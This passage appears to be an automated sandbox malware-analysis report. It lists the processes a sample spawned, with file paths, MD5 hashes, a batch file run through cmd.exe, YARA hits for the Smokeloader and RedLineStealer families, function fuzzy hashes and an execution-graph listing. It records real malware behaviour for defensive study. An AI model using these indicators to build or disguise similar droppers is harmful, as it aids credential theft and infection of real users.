                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:38
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:39
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:40
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:706'560 bytes
                                                                                                                          MD5 hash:F1EEAE7DAB5E51B2A76DB6651423C9F5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:41
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                                                          Imagebase:0x790000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:42
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version
                                                                                                                          Imagebase:0x4a0000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:43
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0
                                                                                                                          Imagebase:0xc10000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:45D3B5DA2599B55F638873CE9E5AF959
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:44
                                                                                                                          Start time:08:53:14
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:45
                                                                                                                          Start time:08:53:14
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4'283'784 bytes
                                                                                                                          MD5 hash:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:46
                                                                                                                          Start time:08:53:14
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002E.00000002.3117320698.00000000006F2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Executed Functions

                                                                                                                            Function 01712601 Relevance: .5, Instructions: 493COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d5e15717882d7dd0509c01009685fd398c59f92ab953bb4a0a64d258c3b558ab
                                                                                                                            • Instruction ID: b6f0e4f5427387f38e5e68f444e2346141ea60a2854d658d8dde8fd6f6ffebe4
                                                                                                                            • Opcode Fuzzy Hash: d5e15717882d7dd0509c01009685fd398c59f92ab953bb4a0a64d258c3b558ab
                                                                                                                            • Instruction Fuzzy Hash: 59F0F6317043409FC706976CA85496ABFBAEFCA61071440AAE50DC7351CA284C1AC7A3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710E68 Relevance: .1, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 46c59476a8eb9b0201879dbb4b55613d56defe659b64da67face41d55795506a
                                                                                                                            • Instruction ID: be9b3f6e24846ac4584901e83b79b9446dbc4e5417517729759ba2fcd46453ce
                                                                                                                            • Opcode Fuzzy Hash: 46c59476a8eb9b0201879dbb4b55613d56defe659b64da67face41d55795506a
                                                                                                                            • Instruction Fuzzy Hash: 12415F30B00205CFC754EB6CD558AADBBF6EF88300F258469E405AB359CB349D86CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710E58 Relevance: .1, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fdf97caaab781726e17ca5cf0d747338e0077b38706532f4c0627fe142744d34
                                                                                                                            • Instruction ID: 9110bfa3ff19e6a67bf8e064ade684699b030f7448e6b5a0b117f374ec945b48
                                                                                                                            • Opcode Fuzzy Hash: fdf97caaab781726e17ca5cf0d747338e0077b38706532f4c0627fe142744d34
                                                                                                                            • Instruction Fuzzy Hash: 06415170B00205CFC758EF68D158AADBBF6EF88304F248569E405AB399CB359D86CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01711CA0 Relevance: .1, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cd757994f7289786e1ded70ea9b477f3990e876397eaf1d6c95c19631b29cfb7
                                                                                                                            • Instruction ID: cc1e61159bfe8feb19411792968da352f0d9c1be3e3c5532086a2c2a09c11fb2
                                                                                                                            • Opcode Fuzzy Hash: cd757994f7289786e1ded70ea9b477f3990e876397eaf1d6c95c19631b29cfb7
                                                                                                                            • Instruction Fuzzy Hash: 521106303083415FC702977CACA89AEBFFAEFC611038980AFD445CB256EA789C06C361
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710839 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8f7fc285c9762b4ce28de955294335927142077a80074dd0149aaa16151ffa1e
                                                                                                                            • Instruction ID: 59ca24a1ae1a6fdacac0c84d66b598ca829977df36ec40685d313d855fa9d658
                                                                                                                            • Opcode Fuzzy Hash: 8f7fc285c9762b4ce28de955294335927142077a80074dd0149aaa16151ffa1e
                                                                                                                            • Instruction Fuzzy Hash: 92117370B94205CFD754DF6DD9597AEB6B2EB88300F204169E802A73A8DB754D41CBD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710848 Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72993100e970be3138b3c9a72de4028aafe2fbcd9740d47535f94145f797e912
                                                                                                                            • Instruction ID: 30f85d2545ef3b05a208610e3bd3cbed967bd8f871cf292dd082b85d94d92d98
                                                                                                                            • Opcode Fuzzy Hash: 72993100e970be3138b3c9a72de4028aafe2fbcd9740d47535f94145f797e912
                                                                                                                            • Instruction Fuzzy Hash: C8115E70B84205CFDB54EB7DD5696AEB6F2AB88200F2045A8E802A73A8DF754D41C7E1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01711CC8 Relevance: .0, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6d7fb5788e6d2164377a4e55932ffe82a665782b19e4f982a63943236bfbd3f0
                                                                                                                            • Instruction ID: bb51b0017132ceaded4e645ee3d8fc751ff7fde6aaee053d84337b728b8158ae
                                                                                                                            • Opcode Fuzzy Hash: 6d7fb5788e6d2164377a4e55932ffe82a665782b19e4f982a63943236bfbd3f0
                                                                                                                            • Instruction Fuzzy Hash: CDF0A4713002015BC714EA7DB89986EB7AFEFC8550391813EE909CB318EE74EC018790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710D1D Relevance: .0, Instructions: 40COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f660b27c37778a4cda9fb8897615eddb043745fb94e298c7800e1c642ccf41c6
                                                                                                                            • Instruction ID: 4937c8be86683a506c8bd82289bb3be2fdb48d4a7804d60cbaa8481b82c3dd64
                                                                                                                            • Opcode Fuzzy Hash: f660b27c37778a4cda9fb8897615eddb043745fb94e298c7800e1c642ccf41c6
                                                                                                                            • Instruction Fuzzy Hash: ACF0C2322086101FC31A6A2DD4146BE76DBEEC16207084ABFD159CB6A8DE649C4A87D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710F62 Relevance: .0, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c3ed07757609bce759ea37a12a1c3fbb61eaf45d61ba2a3253d60b6792395e22
                                                                                                                            • Instruction ID: e9afb67badeadc85bf9c13f8d0a42a651d5022d6abd49b339f7dc696c030f537
                                                                                                                            • Opcode Fuzzy Hash: c3ed07757609bce759ea37a12a1c3fbb61eaf45d61ba2a3253d60b6792395e22
                                                                                                                            • Instruction Fuzzy Hash: 7A01AD307002058FC704EB7CE5909ADB7A7EFD8310B208829D4169B36CCB75AD468B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 017117F0 Relevance: .0, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2dcd8e457936896c628608f03f4b4b6504658a1db96fadc1377c215fa166b541
                                                                                                                            • Instruction ID: 44603fe89ea45857e0e1e1198ee3477097939d9377c7766c46857123758e523e
                                                                                                                            • Opcode Fuzzy Hash: 2dcd8e457936896c628608f03f4b4b6504658a1db96fadc1377c215fa166b541
                                                                                                                            • Instruction Fuzzy Hash: 95F0BB317142904FC756577C94545EA7BB5DFC662070A40E7D505CB252CA584C0BD7E3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 017108F5 Relevance: .0, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7be6ec0a18f423e2d5969e49c98f35257a66bd75ad1ea8338a8624aeb90a51f9
                                                                                                                            • Instruction ID: e1b0f0fb689c690d3cd122cae07d5d76d96ccaa0edbb82436bfb4d076b34cb87
                                                                                                                            • Opcode Fuzzy Hash: 7be6ec0a18f423e2d5969e49c98f35257a66bd75ad1ea8338a8624aeb90a51f9
                                                                                                                            • Instruction Fuzzy Hash: 2BF06D64B44119CBDB14AB6DC06872EB293BF95748F004469E506AB3EDCF389DC28796
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710D88 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cad53f173d3f21a9274358696c089710ba2096c0446f9468ed1c5ace94e704a2
                                                                                                                            • Instruction ID: 059e3e02f2f071d6367aee0bcba64639731b7836f73fcd787186676adb673c1e
                                                                                                                            • Opcode Fuzzy Hash: cad53f173d3f21a9274358696c089710ba2096c0446f9468ed1c5ace94e704a2
                                                                                                                            • Instruction Fuzzy Hash: C7F0E9322052011FC31A9B7E94504BE7BEABDC161031589BFD049CB669DF359C0A87D2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710879 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7682d6cacb282787a276f684c1aa8014913e3294ec8bfa031d374acb9e2ddb2c
                                                                                                                            • Instruction ID: 8fc9d0c09d7aaf97efc3669957d8db395d82515850df7b3e427242ca38661616
                                                                                                                            • Opcode Fuzzy Hash: 7682d6cacb282787a276f684c1aa8014913e3294ec8bfa031d374acb9e2ddb2c
                                                                                                                            • Instruction Fuzzy Hash: E9F04F70B84205CFC754DB7C85597AEB6A2AB98244F204458E802AB36CCB744D85D7D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 017108FE Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4eb6d80f259e87bb1457bc3673e1d95ee59acd57188c4d4d7b1f66a6153b9c19
                                                                                                                            • Instruction ID: 82065ea6467fabb7e084bf21483c3ad295abb335ae7ccfc880cfc0e0acb4338a
                                                                                                                            • Opcode Fuzzy Hash: 4eb6d80f259e87bb1457bc3673e1d95ee59acd57188c4d4d7b1f66a6153b9c19
                                                                                                                            • Instruction Fuzzy Hash: 46F0B464740119CFDB14AB3DC06862DB2936F95748F004469E506AB3FDCF389DC28796
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01712A00 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 97e1b87e650a6936297ea419f59dbbaac83e005219ec07ceb53c844ba5599304
                                                                                                                            • Instruction ID: 64f0f19dbf79cb153ca85b5b27b24cff8ac963bf53b7d3f038e2d9ddc9043b82
                                                                                                                            • Opcode Fuzzy Hash: 97e1b87e650a6936297ea419f59dbbaac83e005219ec07ceb53c844ba5599304
                                                                                                                            • Instruction Fuzzy Hash: 13E06131B141509FC755527C68145BB7BEAC7CA72070940B7D54DD7341CD150C0B83E3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01711C48 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c8199ab5e345ee0c6ffeafdef83fca023483905344afab1a40b823c1e0ec0a13
                                                                                                                            • Instruction ID: 7de2f314db7a5b264a80237a75c1c1c42e5061dd72d3ebc1aaa411f5cbdee57b
                                                                                                                            • Opcode Fuzzy Hash: c8199ab5e345ee0c6ffeafdef83fca023483905344afab1a40b823c1e0ec0a13
                                                                                                                            • Instruction Fuzzy Hash: B6F05E7190D3949FC742DB78D9A058D7FB4EE47210B0640EBC445CB262E6345E05DBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01711C68 Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 14b29f3acdc577d0e218263a77a7a5934d1e354a6bc2125a8f36dd2a13fcb38e
                                                                                                                            • Instruction ID: 573ec91b3a6555f9b9a1d2a93ef7f9c8ce5a83ab58c067e5b694191926d28e84
                                                                                                                            • Opcode Fuzzy Hash: 14b29f3acdc577d0e218263a77a7a5934d1e354a6bc2125a8f36dd2a13fcb38e
                                                                                                                            • Instruction Fuzzy Hash: 1DD05E70A0510DEFCB40DFA9EA4199DB7BDEF44610B1081AED808D3324EB326F009B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01710969 Relevance: .0, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9eba8f0cf471fe3aee81d7f5306cf4dffa95ab6421d3dd5ed75c89d5146e5e2d
                                                                                                                            • Instruction ID: 94f3482004ec8dd1bc1bc99b5dcefc1a7844715a64d993521370e5ff08259405
                                                                                                                            • Opcode Fuzzy Hash: 9eba8f0cf471fe3aee81d7f5306cf4dffa95ab6421d3dd5ed75c89d5146e5e2d
                                                                                                                            • Instruction Fuzzy Hash: 78A0024519C419D58704167AC564429A4069A9134930515765A071A5FA5C981691919F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:21.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:2.4%
                                                                                                                            Total number of Nodes:1521
                                                                                                                            Total number of Limit Nodes:22
                                                                                                                            execution_graph 5452 407548 5453 407554 CloseHandle 5452->5453 5454 40755d 5452->5454 5453->5454 6689 402b48 RaiseException 5894 407749 5895 4076dc WriteFile 5894->5895 5901 407724 5894->5901 5896 4076e8 5895->5896 5897 4076ef 5895->5897 5898 40748c 35 API calls 5896->5898 5899 407700 5897->5899 5900 4073ec 34 API calls 5897->5900 5898->5897 5900->5899 5901->5894 5902 4077e0 5901->5902 5903 4078db InterlockedExchange 5902->5903 5905 407890 5902->5905 5904 4078e7 5903->5904 6690 40294a 6691 402952 6690->6691 6692 403554 4 API calls 6691->6692 6693 402967 6691->6693 6692->6691 6694 403f4a 6695 403f53 6694->6695 6696 403f5c 6694->6696 6698 403f07 6695->6698 6701 403f09 6698->6701 6700 403f3c 6700->6696 6703 403e9c 6701->6703 6704 403154 4 API calls 6701->6704 6708 403f3d 6701->6708 6721 403e9c 6701->6721 6702 403ef2 6706 402674 4 API calls 6702->6706 6703->6700 6703->6702 6710 403ea9 6703->6710 6712 403e8e 6703->6712 6704->6701 6709 403ecf 6706->6709 6708->6696 6709->6696 6710->6709 6711 402674 4 API calls 6710->6711 6711->6709 6713 403e4c 6712->6713 6714 403e67 6713->6714 6715 403e62 6713->6715 6716 403e7b 6713->6716 6719 403e78 6714->6719 6720 402674 4 API calls 6714->6720 6718 403cc8 4 API calls 6715->6718 6717 402674 4 API calls 6716->6717 6717->6719 6718->6714 6719->6702 6719->6710 6720->6719 6722 403ed7 6721->6722 6727 403ea9 6721->6727 6723 403ef2 6722->6723 6724 403e8e 4 API calls 6722->6724 6725 402674 4 API calls 6723->6725 6726 403ee6 6724->6726 6729 403ecf 6725->6729 6726->6723 6726->6727 6728 402674 4 API calls 6727->6728 6727->6729 6728->6729 6729->6701 6248 40ac4f 6249 40abc1 6248->6249 6250 4094d8 9 API calls 6249->6250 6252 40abed 6249->6252 6250->6252 6251 40ac06 6253 40ac1a 6251->6253 6254 40ac0f DestroyWindow 6251->6254 6252->6251 6255 40ac00 RemoveDirectoryA 6252->6255 6256 40ac42 6253->6256 6257 40357c 4 API calls 6253->6257 6254->6253 6255->6251 6258 40ac38 6257->6258 6259 4025ac 4 API calls 6258->6259 6259->6256 6260 403a52 6261 403a74 6260->6261 6262 403a5a WriteFile 6260->6262 6262->6261 6263 403a78 GetLastError 6262->6263 6263->6261 6264 402654 6265 403154 4 API calls 6264->6265 6266 402614 6265->6266 6267 402632 6266->6267 6268 403154 4 API calls 6266->6268 6267->6267 6268->6267 6269 40ac56 6270 40ac5d 6269->6270 6272 40ac88 6269->6272 6279 